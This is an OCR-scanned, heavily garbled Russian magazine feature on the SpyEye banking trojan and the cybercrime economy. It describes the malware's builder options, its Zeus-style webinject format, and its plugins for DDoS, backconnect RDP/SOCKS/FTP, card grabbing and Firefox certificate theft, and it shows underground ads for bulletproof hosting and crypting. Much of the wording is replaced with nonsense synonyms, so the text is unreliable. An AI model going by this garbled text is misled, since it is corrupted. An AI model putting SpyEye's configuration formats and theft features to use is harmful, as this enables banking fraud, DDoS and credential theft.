Collector.

Коллектор представляетсобой дворовой п од ОС

GNU/ L i пu x, приним ающийжурналы работы отботов.
Протокол, использующийсядля отправки л огов, осно ван
в ТСР да носитназвание Sausages. В нем используется
ши фрование равно LZ О-компрессия . Д емо н пр оелу шива ет
насчёт пр е деле нн ый п сбойка н а пр е дм ет логов с б от во да для л а дет равным образом х на

MySQL. Таким образом, к его работы нате сервередолже н
бытьустановлен GNU/Liпux равно MySQL. Кроме этого, ради его
установки необходим SS Н-д осту п ко серверу.

RDP BackConnect Server. Се рв е р представляетсобой
от т а тич ески саккумулированный би н арный обложка подОS GNU/ Liпu x.
Демон складирует информацию по отношению подключенных клиен т ахти
вMySQL .

- -·--·-...
-------- _
,.._. ____
-·--- --...
аза --­

КЛИЕНТСКАЯ ЧАСТЬ
0. FormgrabberCP (Collector"sGUI).Дл ваш покорный слуга поиска информа ­
ции на базе коллектора дано интерфейс, нарисованный получи и распишись
языке РНР, во виде панели у пр авле ния фо рмграбб е ра. Панель
у пр авле ния сего ~о ду ля н е пр е дна значена с целью того, чтоб

находитьсянасервере.Этоклиентскоеприложение.

0. Builder. Программа, создающая

н а базеуказа н ных настроек

з н ачительно выгнать размер билда бота.

Encryption kеу-кл юч,

вместе с л е усик тан овки).

кото рым шифруется config.Ьiп.

Clearcookieseverystartup- ecли включено, ведь кавасаки пр равным образом

Работа модуля
удаленного

Mutexname-и мя

Ключ п рописывается да во бота .

mutex"a, мурлыка орый

используется в целях

рабочего стола

идентификации бота во системе.

каждом запуске !будь ведь из-за п уск ОС иначе вслед п уск билда бота по­
не без; л е об н ов л ения) будетуд а л автор ть сооk i еsбрауэеров IE да

а

ЕХЕnаmе -имя файла бота во системе пользователя ! п о­

конеч н ыйехе-файлмалвари. Воттолькочасть изо н и~

Anti-Rapport- этo вделанный модуль, энергично противо­
д ейс тв ую щий антируткиту RappoгtTгusteeг. В частности,

FF.

FF уж запущен, ведь cookies н е удалятся, таково
cookiescookies.sqlite.
Delete non-exportaЬie certificates- во криптахранилище
Windows ! сие хранили щ е равным образом испольэуетбрауэер IE) су ществует

Sру Еуеубивает п отоки Rappoгt"a равным образом блокирует записьотладоч ­

частный молодчик сертифика т ов - н еэкс п ортируемые . П оль зова­

раэличныетроянытипа Zeus"a сидеть безграмотный будут. Тот но

тель может их использовать, однако их не велено экспортировать,

н ап рим ер, далеко не сможетснятьхуки бота около включенном модуле

скажем, во *.plx, да послать во коллектор. В этом случае во
SpyEye глотать достижимость отослать совершенно сертификаты сего фигура а.

Aпti-Rappoгt .

В этом случае пользователю ни ложки особняком отнюдь не останется, равно как

screeпs h ots . В ней могутнаходитьсятекстовые файлы со пра­

паки экспортировать обязательство во криптохра нилищ е . Апри

вилами сбора скри нш отов. Скриншоты снимаются быть клике

Если брауэер

на правах FF открываетхэндл получай обложка базы

ных сообщений во е го базу отчетов. Кроме того, этотмодуль
следитэа целостностью хуков бота . Таким образом, даже если у бота

включен таковой модуль, так ни антирутки тытип а Rapp oгt"a, ни

RKU,

Screenshots. В каталоге билдера есть пап ка

импортеботужесниметфлагнеэкс п ортируемостисертифика­

мыши . Пр да этом на центре скриншота получай х одится стрелка мыши .

та, равным образом та каковой сертификатможно будетотправит ь во коллектор.

Фай л правил со дер житс тр оки, каждая с которыхдолжна

Dontsend http-reports-B НТТР -от ч е та х бездна мусора. Та ­

охватывать пят ь два метров , разделяемых пр обелами . Формат

ким образом , имеетсмысл отпра вл ятьтолько НТТРS -отчеты

следую щ ий:

!ну равным образом выгода НТТР-отчеты сданными Ваsiс-авториэации).

Compressbuild ЬуUРХ- неравно

вклю ч ено, в таком случае билдер сожмет

%URL

билдбот а UРХ"ом . Если используемый кри птор малограмотный сжимает

МАS К%

%WIDTH%%HEIGHT% %М INIMUM CLICKS%____

%.MINIMUM_$JCQNQ$%

- - - - -..- -..····----..-

материнский файл, ведь каста по части пци автор важ н а.

Make buildwithoutZLIBsupport- нecмoтpя для исполь ­
0.0 на FF-инжектах да сверху безденежье
вслед обнаженно во ка Accept-E ncoding, есть такие во еб-се рв еры могут
возле выпадать свернутый контентlнапримерgziр, dellate). В этом

Здесь URL_MASK-этo трафарет

зование протокола НТТР

зит п по части

URL. Е сли п риложение гру­
URL ресурс, п опадаю щ ий подэту маску, так включается

соответств ую щее обычай отправки ск р ан ш отов. Существ ует
одн а пр облема,с вя эан ная соскриншотами. Б с у хватит

случаеSру Еуе испольэуетбиблиотекуzliЬ, дай тебе распако на ат ь

пр облематичноуэнать, сверху какой-нибудь странице со во ершается возглас

контент да проинжектитьего. С этой включенной оп ци ей бил­

!например, ввидутого почто во браузере можетбыть множеств в рассуждении

дер генерируетби лд бота вне п оддер жкиzl iЬ "а. Это сэко номит

вкладок). Дл моя особа сие го су щес твуют дв а п ара метра: минималь-

а
РаботаFТР
бэкконнект­
сервера

05-16 Кв размера бил д а !если замерять разницусжатых
UРХ"ом билдов) . Однако во случае, ежели придетсжатый ко нтент
во

FF, ботик невыгодный сможете го нагнетать .
Make LITE-config- oп ц ия касательно пр еде ля ет, нужно ли вводить

на со nfig .Ьiптакие вещи, кaкweЬi nj ects, scгee nshot s равно плагины

.-....=.".

~- .:.т.

0

.~·~

0

L-.. " ~

"1".:10

(

VIIIШT

q,,::e;;

:tJ """"""

" ~\,SOCКS 0 ~ RDP

v:=

((ii_,~P,

~--""

!кроме customconпectoг.dii) . Д eлo на фолиант , сколько присутствие создании
бил согласен бота coпfig . Ьiп ВСЕГДАвшивается на апотеций бота. В свою
очередь, сие влияе т нате размер исполняемого файла ибо та . Пр равно
испольэованииэтойопцииботпослеотправкиданныхна

управляющее устройство ботнет а загрузитко нф игурацию с невыгодный го со во всем
необходимым инструментарием. Такой отношение п озволяет

ХАКЕР

00 / 053/ 0011

079

MALWARE
формграббера , у казав признак поиска

"GRABBED

Hooked Fun ction :

ОАТА" .-При м. ред.)

Н-анал оги ч ен флагу Lза исключением того, в чем дело? на сгра­

.: t~~~-\

бленноесодержимоеневключаетсясодержимоетегов

• u..t!• ll\l l l llo -

o

··~··-~-····· ·-··-·

..

data

:! t;~:E-=· (-•)

data_before, data_inject, data_after

:::~ ~~:.i"t.~···
l .щ__

..
IJ

~\

Существуеттри от итуации подле работе вместе с этими т егами :

• .... tllll

: "f.,.,.__

Ьеfоге равно d ata _afte г.

0.

=~:~-···· ·-"" af"

. . . ····

н т~~~
~ ~~----.1111 :·

Если найден контент nо маске data _ befoгe равно содержание
тега

•.

»

---··~

----".---...

data_after пус то, так ... - кавасаки вставитсодержимо е тега
data_inject П ОСЛЕ data_before.

0.

...,

Если найден контент по части ма не без; ке data _afteг равным образом начинка

тега data_befoгe пусто, так ... -ботвставитсодержимоетега

,.-. ...... " " -

data_inject ДО data_afte г.
0.

Е сли найден контент согласно маскам data_before равным образом data_after,
в таком случае ...- ботзаменитконтент меж дутегами data _ befoгe равно
dаtа_аftегвключительно держи предмет тег а data _ iпject.

а
Инжекты
на действии.

На пра кти ке была обнаружена следующая особен н волос
только е да максимальное численность кликов-чтобытак либо — либо

веб-сервера ВО дnри да со п ользовании НТТР 0.0 [именно эту

по-иному [оnираясь сверху численность кликов равным образом время, nрошедш ее

версию НТТР Sру Еуе ис n ользует на инжектирования страниц

вместе с момента загрузки НТТР-ресурса , указа нного на URL_MASK)

во спринклер ре Mozilla Fiгefo x ). На некоторых ресурсах [*

отключать nравило скри н шатав .

веб-сервер возвращал из жатый контент, п ри этом на Content-

Client: Builder:weblnjects. В каталоге билдера nрисут­

css, *.js)

Encoding безграмотный было указано, что-то контентсжа т ый . Приводило

ствует паnка weЬinjects . В ней могут бери ходиться текстовые

эт по отношению для тому, в чем дело? браузер распознавал контенттаки х рес у рсов,

файлы от nравилами инжектирования НТТР/НТТРS-ресурсов.

во вкусе lnvalid

Форматинжектовтакой но , что равным образом пользу кого Zeus"a. Однако nоддер­

Несмотря для nодобные проблемы веб-сервера, сие допускается ис ­

живаются никак не целое флаги маски set_uгl. Тем никак не поменьше nоддержи­

прав ить средствами SpyEye, насчет от в таком случае составив пус тое nравило

ваемых флагов вnолне достаточно, к того чтоб барабанить в рассуждении

[с пустымитегами data_befoгe,

nолной совместимости из инжектами Zeus"a. В файле nравил

инжектирования

data_inject равным образом dаtа_аftег)для
css- иjs-ресурсов.
Builder:serial.txt. Билде р привязывается для а л ез н ой

со держатся блоки вместе с четырьмя тегами: set_uгl , data_befoгe,

data_inject, data _afteг[нynлюcтeгdata_end еще, указываю­
щий в конецтега из префиксом data_):
set_url
В этомтегеуказывается ма из ка , получи и распишись которой сработаетсоот­

Content, равным образом ступень от б ражалось некорректно .

части компьютера, а серий ны й пункт ваша милость верно ет ра зработчик
вредоносного ПО . Ачтоты хотел: лицензионная nр по отношению гра мма!

Client : Builder: collectors.txt. В ката л оге билдера обязан
н аходи ться обложка collectoгs .t x t . В обложка позволено пропи от ать вместе с пи­

ветствующее начало инже ктирова ния. Также в духе равно во Zeus"e,

терпентин , каждая строчка ко оторого имеетследующий микроформат [такие

синтаксически поддерживаются такие имущество , как бы « * » равно « # ».

из тр оки разделяются Еntег "ами):

Этоттег можетсодержать разные флаги [по умолчанию
G-означает, что такое? инжектированиебудетпроизводиться

iр:рогt- сие IP, сверху котором установлен SpyEye Collectoг
PORT, который-нибудь канал слушает получи и распишись предметжурналов
работы . Вместо IP можноуказатьдоменное псевдоним . Коллектор,

толькодля ресурсов, которые заnрашиваются GЕТ­

в качестве кого правило, исnользует какой-либо знатный , « расnро­

методом.

из траненны й >> nорт [80 либо 043), народ на н екоторыхлокальны х

Р-означает, ась? инжектирование короче вырабатывать ся

сетя х маршрутизаторы могут блоки ровать отсылкутрафика

используется флажок G):

равным образом

толькодля ресурсов, которыезаnрашиваются РОSТ­

нанестандартн ые п выработка ы .Вслучаене во озмож ности через прав ки

методом.

данны х вследствие основной коллек так р кавасаки короче мучаться отn р авить

L- nред ставляет из себя

кумач на перехвата- граббин ­

данн ые, исnользуя коллекторы, указа нны е ни но [nауза средь

га содержимого междутегами data_befoгe равным образом data _ afteг

n относительно пыт ками составляет0 , 0 секунды) . Е сли кавасаки дойдет по кон ца

включительно. Пр равным образом этом сграблен ный конте н тбуд ет

вместе с 3 ска да способности через п равитьтак да безвыгодный удалось, ведь симпатия со х ранит

отгораживаться китайской стеной содержимым тега data_inject. [Сграблен­

отзыв во специальном х ранилище да будетnытаться отnравить

ноесодержимоеможнонайтивпанелиуnравления

эмпирика nри следующей отс ылке логов.

ПЛАГИНЫ ДЛЯ КЛИЕНТА
Дл мы обеспечения недо со тающей на базовой части клиента

ОТЛИЧИЯ ИНЖЕКТОВ
ОТ НЖЕКТОВ ZEUS"A

SPYEYE

функцианальности вместе с уществуют пл агины. Они в свой черед указыва­
ются во билдере.

Client: Plugins :weьtakes . Плагин weьtakes может исполь­
зова тьсядля п одм е ны содержимого НТТР- равно НТТР S -р есурсов
безобращениякоригинальномувеб-серверувбраузерахiЕи

орядок следования тегов data_befoгe ,

data_inject, dаtа_аftег-для SруЕуе "я некто
важен равным образом долина а н существовать им е нно такой, а интересах Zeus"a неграмотный важен. Zeus п что касается умо л чанию

FF. Конфи гурационный обложка

инжектируетСSS- да JS-контент. Однако, с целью нагнетать таковский контент на

сле дующим образом :

SpyEye, всенепременно нужно основать прав илотаким образом , с тем на теге set_ uгl содержа­
ласьстрока << .css» либо <<.jS>>[в зависимости через вроде контента для того инжекти нга).
В SpyEye некорректно реализован флагН-в Zeus"e некто используется про удал ения
НТМL-кода изо сграбленного контента НТТР-ресурса . В SpyEye вместе с п е ц мандала << # >> вполне
аналогичен << * >> [в теге set_uгl). Хотя во Zeus"e сие н е эдак равно сnецсимвол<< # >> используется по образу

пла г ина совместим из форматом

п что до ддель ны х страниц , используемы х Zeus"oм , равным образом выглядит

entry "WebFakes"
%URL_МASK%

%URL_REDIRECT%%FLAGS% %POST_BLACK_MASK%
%BLOCK_URL%%WEBFAKE_NAME%

%POSJ_WHIТE_MASK%

СИНОНИМ «НОЛЬ ИЛИ ОДИН произвольный СИМВОЛ >> .

080

ХАКЕР

00 / 053/2011

Глаз зла

Мonl~..

0

""

OJ/1 0
061111107

VIRТEST

.fS sJ~\к
D Plualns

FTP BackConnect. Плагин поднимает ПР-сервер возьми боте

Crнte r.u ~ s~"J~к

..

~ ~r...

\\. socкs

равно nредоставляет приступ ко немучерез BackConпect-cepвep. В

0

:; """" 0

RDP

!.,.L

!-:JE:

главной п а н е ли управления не без этого интерфейс, позволяю­
щий изображать наличность FТР-серверов.

Flles

RDP BackConnect. Плагин поднимает RDP-cepвep да
прокидываетего предварительно BackC oпnect - ce pв epa. Также плагин р еа­

Ta sk list
(_Ь ..

l •f• St.t Dtl

00 01·03·1 01\ . SOolt

~

hb

V l!!I X

про удаленного использования П К в соответствии с пр насчёт токолу RDP. Ещ е на

нем предусмотрена панельуправления про запуска любого

....... ......... ~ ...

v

l"tl•

$1.

лизует формирование сокрытого пользователя, некоторый равно нужен

п роцесса с любого пользователя на системе !чтобы позволительно
было соз всучать пр насчёт це ссы с имени оригинального пользо­

вателя!. И до этот поры встроена РогtаЫе-версия TotaiCommaпdeг "a,

0000•00•0000 -00 tOO

.20 0 0·0J·I II Io,]o2 •

"v
v"

загружаемого равно з интернетаи после п ускаемого неуклонно изо п амяти

!без сохранения для диск!.
Плагину отнюдь не нужна пере погрузка ОС для того работы .
Плагин включается сквозь главную панельуправления .
Сnисок б от на не грех испытать на соответствующем пункте список

Вид контроnnера ботнет а

IRDPI. Подключать ся ко ботам позволяется посредством ста ндартное П О ОС
Windows <<mstsc.exe >> Remote Desktop Conпectioп .
Минусытекущей версии пл аги н а:

С подменой во браузере FF связан сам нюанс. Ввиду
особеннос тей API библиотеки nspг4, эмпирика POST-зa npo ca,

блистает своим отсутствием поддержки х64-систем;

поступающие с целью анализа на плагин подмены, ограничены

плагин у нужны компетенция администратора с целью работы;

длиной на 0 Кб. То ес_ть присутствие составлении правил подмены

далеко не п оддерживается Win7 Staгteг !именно Staгteгl;

используются таки е переменные POST-зanpoca, которые

вдобавок того, убирать плагины для того разработчиков равно отладки!

входят во первые 0 Кб НТТР- вслед проса !включая размер НТТР­
шапкиi.Плагин малограмотный т ребует включения со стороны жете н ели

ЗАКЛЮЧЕНИЕ

у правления .

После ознакомления вместе с сим зверьком равно егодокументацией

DDoS. Плагин можетбыть использован, с тем осуще­

становится ясное дело , почто п ере д нами - п олноценный для ­

от твить DDoS -a тaкy получай некоторый сервер. Конфигурация

граммный продукт, взять хоть равным образом пр е дназначенный пользу кого совершения

плагина имеетследующий вид:

nротивозаконныхдействий.Компьютернаяпреступность

type taгget poгttime.
type taгget рог! time.
tуре-тип DDoS"a. Подд ерж иваются сле дую щишки е:

пере хо дитнановыйуровень из воегоразвития.И не без; пользуемые

s lo w l oгis/ssyn/udp.

зто пугающие тенденции . Уже существуют целые индустрии

taгget-IP либо хостсервера, сверху что осуществляется

соответственно написанию вирусов, предо оставле ния ботнетов во аренду,

атака.

пр одаже трафика пользу кого заражения равным образом усишко тановки б от на . Функ­

инструментыисредс тва,разделениеобязанно от тей,сра­
щ ивание из организованными преступными группами- всё

рогt - порт, подвергаемый DDoS"y !для UPD DD oS позволено

ционал SpyEye поражает, а реальность nодобнойтехнической

означить О, для того выбора случайного порта!.

оригинал а циигов орито пр офессионализмее горазработчи­

timе-время , на изм которого полноте совершать -

ков- неудивительно, ась? пишущий сии строки наблюдаем колос из альный расширение

ся DDoS !для UDP/SSYN используются секунды, с целью

числа мошенничества вместе с системами ДБО . Стоимо вместе с ть SpyEye бери

Slowloгis-минyтыl.

черном рынке колеблется на районе десяткатысяч долларов

В конфигурации плагина позволено назвать куча зада­

после версию от полным набором модулей . Учитывая све р х­

ний получи DDoS lплагин переходитот одного задания ко другому

выгодность пре сту пн ой производитель да сти, которую позволяется

понемногу , невыгодный мно го п через очноl. Дл автор этих строк ти п а DDoS"a Slowloгis невыгодный

выполнять вместе с е го через , зто пока что малограмотный целый ряд .

а
А воттак

:J:

создаются

нужно следовать вверять портlпоумолчанию используется 00 - ыйl.

самиботы

Плагин требует включения со стороны п анели у пр авления .

Client: Plugins: ссgгаЬЬег. Пл агин занимается сбором

------~-----------

-----

информации касательно банковских картах, анализируя РОSТ-запросы

- - - - - - -- -- -- -- - -

приложений . Дл ядетектированияномеровбанковскихкарт
используется Luhn algoгithm. Если нашелся валидный выпуск

Spy

карты, ведь полный POST-зanpoc отсылается на коллектор. Найти
не без; грабл ен ны е СС позволено при помощи согласующий интерфейс

Еуе . .э

поискавпанелиуправленияформграббера .

ffcertgrabber. Ба зо вая

комок пл ектация Spy Eye занима­

lli! djf•hh99399gh4rha Г.hdsfoh

ется хи щени ем сертификатовтолько с криптохранилища
Clear cooki.,- e very startup (IE, FF):

г

f! A•6-JШs!od • P

р

FF "-"blnj.cts: f;i

Windows. Однако Fiгefox исnользует собст венное хра нилище

Delete

сертифИкатов . В взаимоотношения не без; сим сделал ть каждому свой плагиндля

Oont send http·reports •

г

Compгess

г

noro-export~Ы•

certific01tes:

хи щ ения сертификатов изо FF. Предусмотрен селекция батман ролей
п что касается словарю на случае, даже если для специальность установле н мас т ер­

b\.llfd

Ьу

UPX v3 .07w :

0

фраза . В конфигурации плагиналишь однозначение ­
минимальноевремяожиданияпередотправкойсертифи­

катов на трубопровод !указыва е тся на секу нда х ! . Сграбленные
сертификаты имеют платеж FF.

Socks5 BackConnect. Плагин п однимаетSОСКS5-сервер

Make UП ·conflg
(witltout -blttjкts, p/Uf}il"!s

& scrнn.Jtot:s) :

г
: ls yste mS.rvice

получи и распишись боте равно предоставляет накануне сту п ко немучерез BackConnectcepвep . В главной nа н ели уnра вления есть интерфейс,

позволяющий отражать не без; nисокдоступны х Socks"oв.

ХАКЕР

00 / 053/ 0011

081

MALWARE

КАК И СКОЛЬКО
ЗАРАБАТЫВАЮТ НАШ
КРИМИНАЛЬНЫЕ
КОЛЛЕГИ?

Баблона малвари

ЭВОЛЮЦИЯ ГРАБЕЖА
В начале 0000 - х гг. ба нкитолько зачин ал идумать в рассуждении своей
некто лайн овой безопасности, а хаке ры-атом , что многоде н ег
оттеда позволительно увести. Не соз нательные нераздельно телескопы находили

уяз вим ости во сис т емах после заслон ы финансовых онлайн-операций
того alias иного банка, уводили базу карточек равно вас от тавляли ее
н а продажу во откры т ом виде . Н а н е в особицу -то засекреченных

форумах дозволено бы л ос поко й н что касается прочит ать именатех н есчас т­
ны х,укоторы ху велибанков ск иереквизиты ,иуз натьдр угие
интимные подр наговор ти. Профе ссио нальны е впадина деры не так — не то
простодурачки ликующе ску палита кого рода информацию,

быстренько печатали требуемый пла ст ик lто естьлевую карточку
вместе с правильной информацией об деньгах) равным образом шли следовать шаг са ть ся во
близлежащий банчишко . Болееумные лепка никак не печатали, а за­
ку пали сь вонлайн - мага зи н ах.

Абу зо уе~ойчи вый

0f""i!ii"
*!!lllbl"3"5§*

А б у зо у со tоичивый се 0 >ве р на Кит ае

VPS

• CPU: l"""el

c-2Qv8d Q8200

· ~ : 0CO.ВDORa

0

HDD: noGB SATA

• LAN :

....

*ЧЩМ"Ь§

000МЬ/1

•noo6..oc

• n...... ~ l5P """naoer - &ЕСПААТНО
Любая функция paэpt~weнi!l
PaccwniCil бu nрокем / соксов paspeweнa

MfiiW!Q

Однако ха ляв у начали быст р в отношении прикрыв ать: вместе с тало появ­
ляться безвыездно сильнее антивирусных решений, которые стали

с.-.-·, ,

__ _"" по отношению , · ~ """" wP8•••

а прямо в глаз невыгодный всего ко юзе рам, так во равным образом банки. А по части сле дние,

o l"to)Jie•eto/lllбoiO..,......,.

не считая т ого, вместе с т а ли ужес точ а тьдо не без; т уп для вместе с воим данным, т по отношению

. .... ~ eor .~

- ~·_,-­
.

ь.n.-т....,;Т"Р8Q108.

естьвзлома ть банксталогораз по сложнее .П риэтомпо­

·----

лиция основы превращать всегда вяще внимания получай подо б ные
крими н а льны е активности, что-нибудь прив ело ко томище у, что-то «заку п

....... ..,.. .. ус-и•

Е МС"

nом..,._..

0\"0I<Тwrto~

~~"t"le200З-Z011

п относительно п ол н ой>> получи очередном хаке рек ом фо р уме был способным обер н уть­

ся встреч ей от пр е дставит елями зако сверху , играющими функция
продавцов . На э пирушка волн е за от теп е нно стал основывать не без; пишущий эти строки

потому что ле е развитой рынок, со своей спецификой равным образом спе ци ализа­

Конечно, масса киберп р есту пни заговор продолжаютэто делать,

ци ейнабанковских тр оя н ахти .

да результативность подхода далеко не стольвы сока. Р езультативны е

Конечно, ник чуна отнюдь не дели сь изначальные почти ходы будто
не без; кимминга, ту п что касается го взлома банкоматов равно пр оче г о, хотя на се сие ,

согласно сути , г рубо равным образом неаккуратно, н е г оворя еще от м, что такое? хло­
п касательно тно, в духе бойко п оняли п арни, которые нашли 0001 из п особ

удары паркет у ча ю т ся р е дк о, быть э волюм гений ные н е г что до дяи у внешность е л и,

во вкусе не грех со совершать потому что льш е да лучше.

дозволительно хостить постоянно

этомоченьдешево

ОТЛАЖЕННЫЙ МЕХАНИЗМ
Таким образом, на затея ста ли тайный около ступать инди­

гл асн по части ста ти из подергивание е относительно т << Ла потому что р атории Каспере кого>>, которая

ви дуумы со мозгами, которые были готовы р окатить д енеж ны ми

внимательноизучаетлюбителей«поломать»банки,за2010

потоками , н в рассуждении н е уме ли 14 са ть малварь . В частнос ти , перед равным образом х

г. ее ана литики добав иначе потому что л ее 00тыс . си гнат у р из на ердикт ом

влиянием базар ста л специализироваться , п оделившись держи

Тгоjап-Sру. Остальныеданные твоя милость можешь п осмотре ть для

неодинаковые г р у ппы, насчёт кото ры х наш брат д альше п об г оворим.

Начнем не без; соз д а т е лей малвари -т ех люд ей, которые

пишут на се сильнее равным образом больше, равно выш еу помян у тый решение

выгодно отличается всехдержат р уку н а пульсе. Вся их д еятельнос ть

превалируе т .

напоминает пр оизво д ствен ны й ци кл любого п рограммнога

Отчего? Оттого, чтозло умы шл е нники поняли , в чем дело? п усть

В Китае, равно как видишь,
что такое? нравиться . И возле

увести всю н олигодон н ую информацию со кусок танцевальный шаг пользователя . Со­

со ответствующем табель е, же налиц отот факт, сколько малвари

а

продукта: равным образом зуче ни е рынк а, соз дани е качественного функ­

л уч ш е соб ирается весь инф что касается рмация, а с годами п осмотрим, во вкусе ею

цион а л а, единоборство вместе с конкурентами . Те, который игра стоит свеч следовать созда ни ем

вос п ользо вать из я. Собирать шимоза ь ко банковские дан ны е вследствие

экс пл оит-пак ов равно су р овой малвари вроде SpyEye да Zeus"a,

бана льный фишинг, электронную корреспонденцию с банков

тщательно д окуме нтир порядок изменения, быстренько вносят

во ключе << пишущий сии строки т ут р е шили обновиться, подтвердите данны е

коррективывкод,кактолькоихначинаетдетектировать

счета >> да пр очиелохатр оны во какой-то мо фараон ста ло н е модно.

оный сиречь идентичный противовирусный вендор, аж добавляют на свою
малварь мини-ан тивир усы, вытирая тем самостоятельно ым наи сильнее
з ло не без; тны х ко н ку рентов . Причем д елаю т что касается н равным образом сие н е невыгодно отличается от следовать ­

Urist
0Тт1p.i811fti!0 05 ~~fth1011

03 01

01С00тt)8 .

Цена:

Дешевенький

Ze us, SpyEye

равно пр очие известные во узких кру гах тулзы не возбраняется бестревожно

недотка держитtя эталонно

оотнет- саежмй .
ПO,._JO Bi"llfПII

а

да выкл а дывают н а фор гений ы п росто таково . Тот но

Наnисан для асме .

00% во

прав ского антивируса. Также стоитупомянуть, что-то хакеры ­
ал ьт руисты на зламы ва индеец дорогие творения своих собратьев

ботнет! Никому
отнюдь не надо?

скачать во крякнутом лицо е.

000$

Такч тосо зд ателямтаки хт рояновпри ходитсябо роть ся

0 coo6щe1111ii
Работаем путем rарантз .

е щ е равным образом от таким видом нападок, безвыездно времена ул учшая своитво ­

Имеем отзыаы .
ОМата исключительно

рения равным образом вам думывая новые не без; р е дства из-за щиты . На стало мозгу на это дело приходит

LR alias Альфа .

Ботнет позволено настроить какдля

DDoS, что-то около

равно для того заливов равным образом лоадов .

а налогия вместе с китайцами, которые н е щ а земля копируютайфоны да

ICO: 094-867-702

двn:.вм

Цвмw •а

a:arpy•w no USA, AU, DE, rт. UK. RU 01 С НГ.
0000 a:arpy•o•:

USA •100$
AU• 03$
DE •120S

ХАКЕР

00 /153/20 01

МАЛВАРЬНАЗАКАЗ,ИЛИСОЗДАЮТ

ЧТО-ТО КРУТОЕ САМИ С НУЛЯ

rт •7os

UK• 08$
RU•SOS
стр :амw снг

ГЕНИИ-ПРОГРАММИСТЫ ИЛИ ПИШУТ

&О$

И НАЧИНАЮТ ПРОДАВАТЬ
083

MALWARE
л о, нужны рекомендации alias инвайты через старожилов . Мо­
Привет sсен . Провожу т есты срмnтора . nоэт011у беататно «:риnтану ваwн файnы

тоестьпосредников ,ко торыеот ве чаютзат~чт~заказав

Крнnтор безграмотный VВд
Гpynn at

n.."...,o•.-r•n•

Coo6щe>iмl< t

007

Реrио:тр 011 ,...,, ое.о2. 0010
nо..мо••т•"•

""" 09

040

малварьу Васи, твоя милость н е без затей выкинешь деньги, а п олучи шь

Крнnтую OU/EXE

Ес т ~о nоддержка ТLS
Крнnтую гибридные 010дулн,

eaw ехе 01eн.яettfl возьми дм,

а круглым счетом но в виток

А• ~т.,.•носn" ~ Добавляю вашу да конку иначе говоря генерирую домашние .
Penyтau. .. ~ t

07

то, аюшки? обещает Ва из я.
Отдельные индивидуумы занимаю тся созданием ботне­

тов . Их не грех арендоватьдля DdoS "a, интересах дальнейш е го раз­

С туч1111 неграмотный стесняеМС~~ .

( 0-. · xopowo)

дераторы форумов зачастуютакже играют функция гарантов ,

ICQ 015011
Jabber porir. y 06Sc;.thesecure . Ыz

златоуст равным образом сбора данны х со ю зе ровенник , интересах в области из ледышка у ющей продажи ,
ради организации анонимных прокси-с ер веров равно т . п .

01.03 .2011 ,

Отдельно заточенные товарищи занимаются пои ском

0 ~: 03

уяз бема стей вот во всех отношениях равно вся. Это самая без танцевальный шаг сная работа. Ты

Пофнtесн.nи.

конечно знаешьлегитимные ресурсы, которые пр е длага­

Все отnнчно отсту~tивает н далеко не nan•щo

07:S

полуют т ебе разветвляться найденными уязвимастями из-за дьявол платно

00. 02. 0"010
rrt : Э:S 0 07

alias следовать мелк ую д енежку в угоду таблица получай земле.

Гpynn fltt ПOIIo..I08fltT8JIO

С оо6ще .... tо ,
Реnоарачн• :

Поn~о2о1 атtя•

ДfltltТeii. HO C"Ilo t ~

Но неграмотный вс е но такие альтруисты, особенно приусловии того,

Р 0П"f1" 0 01и• : 0

что-то соз датели экс плоит-паков могутзаплатить вслед за найденн у ю

( 011.- xo p o w o)

уяз вимость несколькодесятковтысяч баксов, неравно выговор равным образом д ет

об Оdау-находке на вместе с амой городок уляр н ой версии Windows"a.
На ко н е ц, автор сих строк добрали не без; ьдо те х, кто, собственно, за­

отлнчно IСРиnтануn , нуn евой детеr.т ,

казывает ве сь насыпь - прест уп ников , которые фильтр у корма
Все , оtтора6отеетnо РуиСНГ, nоосннне nонеще ., .. е !

тонны ук радоваться енной информации равно выставляют ее возьми продажу

во не без; пециали з ированны х магазинах !см . согласующий
скриншот).
Это дилеры, которые пр едлагают конечным потребите­

а
Как видишь ли в соответствии с

оставшиеся модныедевайсы, тем самым подрывая производство больших

лям -др угим пр сделал т у пн икам, -д осту п ко живым д еньгам.

равным образом успе шны х контор.

Н у ведь лакомиться пр актически живым. Пол у чить дост у п ко таким

Очевидно, чтотакие программ е ры со тоят несравненно более

отзывам , крипт

магазинам из л ож но: должно фигурировать во т усо вке, рег улярно за­

всерьёз

типичногоаналитика на антивирусной компании , притом на пря­

наслаждаться возьми старшие средства . Пр авда , равно предоставляемый

помогает догнать nо­

мом смысле. Согласно рассказамне хо роших мгла ней , которые

се рвис в высоте: дать на лапу допускается до сей времени что-то у годно . Мы ранее

ставленных гнусных

целей

а

создают ре альныетроя ны равным образом экс плоит-паки, их недельный за­

во ско ль зь упомянули в рассуждении том, что-нибудь крадут совершенно : н омера банков­

работок больше, нежели лунный у типичноготоп -менеджера во

от ких картспинами да банковские счета -товар , которым

запа дной компании . Таки елюди сроду безвыгодный перейдут мучиться

ни души н е удиви ть да какой-никакой на из вет е активизации киберпо­

во нормальную компаниюдаже руководителями разработки:

лиции изрядно небезаnасен ради об налички. Правда , кушать

да не сделаете чтотолько сообразно вместе с ле того , что от танут миллионерами . И есте­

мочь зак азать карточку определенного литровка ,

ственно, из тем с целью безвыгодный мерцать вдальнейшем.

определенного типа, н медянка утнапиштим не без; траны , в чем дело? во полоса е вместе с л учае во

Гении-пр относительно граммисты иначе говоря пишут малварь получи заказ, либо — либо

С раскачивать SpyEye
может любой, кто именно во
состоянии заткнуть за пояс

приводит для не без; ильном у снижению градуса опасности !ты,

соз дают черт знает что крутое самочки от н ульяна да начинают пр одава т ь.

в частности , не без; лышал относительно киберполиции Лао са?). Н а з ака з пр о­

розыскной запрашивание во

Д елаю т они сие п о-прежнему чере з тематические форумы,

давецдостанет до этого времени чт в рассуждении у годно . Цены демократичные -1 О

Google

лишь попас т ь нате них днесь н е бессчетно от ложнее . Как прави-

% ото по сту пн ой налички.
Кроме того , позволено купитьлюбые платные аккаунты-на
рапидшару, на Ж Ж, скай п равным образом проче е. На вирту альны х полках
лежат украденные лицензии чтобы со фта , включительно , что-то са мое

Пр исследование nолноМ версии

сме шн ое, антивир усишко ы !см . скрин ш через ) , парали илогины для FТР­

:~

серверам !б пенис ет идеже похостить руководящий середка ботнета) .

.

Pantiflck

Впо со ледне е времяпоп улярн ос тьнабираетпродажа

Spyf ye .1.1.39

сплетня , ведь естьукраденныхданных что до паспортах, пр по отношению писке,

Spyfyt .l.l .SO

u.-• (http:/t - .s.nctsp- .COI"I"Y"fole/nNo>
